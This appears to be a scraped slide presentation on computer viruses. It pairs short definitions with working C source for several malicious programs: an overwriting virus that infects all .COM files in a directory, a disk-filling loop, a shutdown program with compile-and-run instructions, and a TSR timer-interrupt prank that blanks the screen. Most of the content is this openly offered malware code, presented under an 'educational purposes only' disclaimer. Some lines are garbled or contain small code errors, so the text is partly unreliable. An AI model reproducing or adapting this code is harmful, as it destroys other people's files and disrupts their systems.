Embed Size (px)
Citation preview
Attaches itself to a program or file leaving infections as it travels.
Usually attached to an executable file (.exe)
Cannot be spread without a human action, (such as running an infected program) to keep it going.
Some basic steps of a source code virus-
1. Find a file to infect, be it an executable, source, or whatever . (If none found, go to step 3)
2. Place virus in file.
3. Decide if any activation routines are met and, if so, activate.
4. Return to host or terminate and return to DOS.
Infections destroy the programs and cannot be cured.
FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE!
Simple overwriting virus
STEPS :
1. Finds all “.COM” files in the specified directory using FindFirst().
2. Opens virus file in read only mode.
3. Opens host file (file searched in findfirst()) in read & write mode.
Virus Code # 1
It will infect all .COM files in the current directory.
4. Read a block of data of 256 byte size.
5. Write the block into host file.
6. Repeat 4 and 5 until whole virus code is copied.
7. Close virus and host file.
8. Select the next file in the searched list and Go To Step 2.
9.Return when all searched files have been infected.
#include <stdio.h> #include <dos.h> /* Pre-processor Directives*/ #include <dir.h> FILE *Virus,*Host; int x,y,done; char buff[256]; struct ffblk ffblk; /*Information about searched files*/
main() { done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */ while (!done) /* Loop for all COM‘s in DIR*/ { printf("Infecting %s\n", ffblk.ff_name); /* Inform user */ Virus=fopen(argv[0],"rb"); /* Open infected file */ Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must be correct for */
while (x>256) /* OVERWRITE new Host */ { /* Read/Write 256 byte */ fread(buff,256,1,Virus); /* chunks until bytes */ fwrite(buff,256,1,Host); /* left < 256 */ x-=256; } fread(buff,x,1,Virus); /* Finish off copy */ fwrite(buff,x,1,Host); fcloseall(); /* Close both files and*/ done = findnext(&ffblk); /* go for another one. */ } /* Activation would go */ /* here */ return (0); /* Terminate */ }
A self growing file.
Virus Code # 2
//START v.c#include<stdio.h>#include<stdlib.h>void main(){while(1){system("dir>>â•ša.exe");}}//END
void main (void){ system("shutdown -s");}
• Save the above file as close.c .• compile (ALT + F9).• close the turbo c compiler • open that directory in window of close.c (default directory c:\tc\bin) • Open its exe file (close.exe).• After some time your window operating system will shutdown.
Shut Down Program
Virus Code # 3
TSR Program
• has a timer interrupt
• selects a random row and columns position at each run
• writes space at that position
• terminates, but, stays resident.
#include"dos.h"#include<conio.h>#include<stdlib.h>void interrupt (*prevtimer)();void interrupt mytimer();void writechar(char ch,int row,int col,int attr);char far* scr;int a,b;void main(){scr=(char far*) 0xb8000000;prevtimer=getvect(8);setvect(8,mytimer);keep(0,1000);}
/* Pre-processor Directives*/
void interrupt mytimer(){a=random(25);b=random(80);writechar(' ',a,b,0);(*prevtimer)();}
void writechar(char ch,int row,int col,int attr){*(scr+row*160+col*2)=ch;*(scr+row*160+col*2+1)=attr;}
THANK YOU
